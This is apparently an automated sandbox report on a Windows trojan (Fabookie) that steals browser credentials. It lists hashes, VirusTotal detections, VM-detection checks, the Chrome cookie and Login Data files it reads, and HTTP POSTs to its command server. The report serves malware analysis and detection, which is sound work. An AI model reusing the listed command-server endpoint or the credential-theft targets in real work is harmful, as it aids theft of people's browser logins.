Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Oct. 18, 2021, 9:27 a.m.	Oct. 18, 2021, 9:35 a.m.

Size	1.3MB
Type	PE32+ executable (GUI) x86-64, for MS Windows
MD5	`5fc5f085acfa0071db7d7ecaca696650`
SHA256	`9d35a2153846ecea71060d69014279cb526f8b432913d02759c5023a81c62d59`
CRC32	`8C069577`
ssdeep	`24576:nkg6rJg7+sAKWHUUuxRfAmBJOQEhP4v4qLq/nbFtU+a1Svk7t:nulgSsAtHUdTzOQoP0Lq/xh9vkZ`
PDB Path	D:\workspace\workspace_c\shellcode_ms\SCY7VJ5UA3Du3GAh1_jm1\x64\Release\SCY7VJ5UA3Du3GAh1_jm1.pdb
Yara	ASPack_Zero - ASPack packed file IsPE64 - (no description) PE_Header_Zero - PE File Signature OS_Processor_Check_Zero - OS Processor Check Malicious_Library_Zero - Malicious_Library UPX_Zero - UPX packed file

customer50.exe "C:\Users\test22\AppData\Local\Temp\customer50.exe"
3024

Name	Response	Post-Analysis Lookup
ip-api.com	A 208.95.112.1	208.95.112.1
staticimg.youtuuee.com	A 45.136.151.102	45.136.151.102

IP Address	Status	Action
164.124.101.2	Active	Moloch
208.95.112.1	Active	Moloch
45.136.151.102	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49198 -> 208.95.112.1:80	2022082	ET POLICY External IP Lookup ip-api.com	Device Retrieving External IP Address Detected

Suricata TLS

No Suricata TLS

This executable has a PDB path (1 event)

pdb_path

D:\workspace\workspace_c\shellcode_ms\SCY7VJ5UA3Du3GAh1_jm1\x64\Release\SCY7VJ5UA3Du3GAh1_jm1.pdb

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Oct. 18, 2021, 9:20 a.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 event)

section

_RDATA

The file contains an unknown PE resource name possibly indicative of a packer (1 event)

resource name

TXT

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

POST method with no referer header

suspicious_request

POST http://staticimg.youtuuee.com/api/?sid=669873&key=a53835fb03e9db9fd734c3e314bbcc07

Performs some HTTP requests (3 events)

request	GET http://ip-api.com/json/
request	GET http://staticimg.youtuuee.com/api/fbtime
request	POST http://staticimg.youtuuee.com/api/?sid=669873&key=a53835fb03e9db9fd734c3e314bbcc07

Sends data using the HTTP POST Method (1 event)

request

POST http://staticimg.youtuuee.com/api/?sid=669873&key=a53835fb03e9db9fd734c3e314bbcc07

Steals private information from local Internet browsers (50 out of 105 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 36\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 65\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 62\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 3\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 24\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 75\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 98\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 28\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 93\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 92\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 97\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 47\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 74\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 21\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 83\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 17\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 69\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 50\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 57\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 63\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 66\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 34\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 80\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 84\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 77\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 64\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 8\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 31\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 4\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 35\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 6\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 72\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 13\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 53\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 23\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 25\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 61\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 82\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 7\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 12\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 95\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 22\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 70\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 73\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 18\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 56\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 55\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 49\Cookies

Looks up the external IP address (1 event)

domain

ip-api.com

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Oct. 18, 2021, 9:20 a.m.	flags: 15 family: 0		111	0

File has been identified by 39 AntiVirus engines on VirusTotal as malicious (39 events)

Elastic	malicious (high confidence)
MicroWorld-eScan	Gen:Variant.Cerbu.112705
CAT-QuickHeal	Trojan.Fabookie
McAfee	Artemis!5FC5F085ACFA
Cylance	Unsafe
Sangfor	Trojan.Win64.Fabookie.WY
K7AntiVirus	Riskware ( 0040eff71 )
Alibaba	Trojan:Win64/Fabookie.19cd5845
K7GW	Riskware ( 0040eff71 )
Symantec	Trojan.Gen.MBT
ESET-NOD32	a variant of Win64/Agent.ATS
APEX	Malicious
Paloalto	generic.ml
ClamAV	Win.Malware.Spyagent-9830839-0
Kaspersky	Trojan.Win32.Fabookie.zm
BitDefender	Gen:Variant.Cerbu.112705
Avast	Win64:Trojan-gen
Tencent	Win32.Trojan.Fabookie.Tazd
Ad-Aware	Gen:Variant.Cerbu.112705
Emsisoft	Trojan.Agent (A)
Comodo	fls.noname@0
McAfee-GW-Edition	Artemis!Trojan
FireEye	Gen:Variant.Cerbu.112705
Sophos	Mal/Generic-S
Avira	TR/Agent.wqvta
MAX	malware (ai score=100)
Kingsoft	Win32.Troj.Fabookie.zm.(kcloud)
Gridinsoft	Trojan.Win64.Agent.oa
Microsoft	Trojan:Win64/Fabookie.WY!MTB
GData	Gen:Variant.Cerbu.112705
Cynet	Malicious (score: 100)
AhnLab-V3	Trojan/Win.Generic.R445766
ALYac	Gen:Variant.Cerbu.112705
TrendMicro-HouseCall	TROJ_GEN.R002C0DJG21
Rising	Stealer.FBAdsCard!1.D97B (CLASSIC)
Ikarus	Trojan.Win64.Agent
Fortinet	W64/Agent.ATS!tr
AVG	Win64:Trojan-gen
Panda	Trj/CI.A

customer50.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All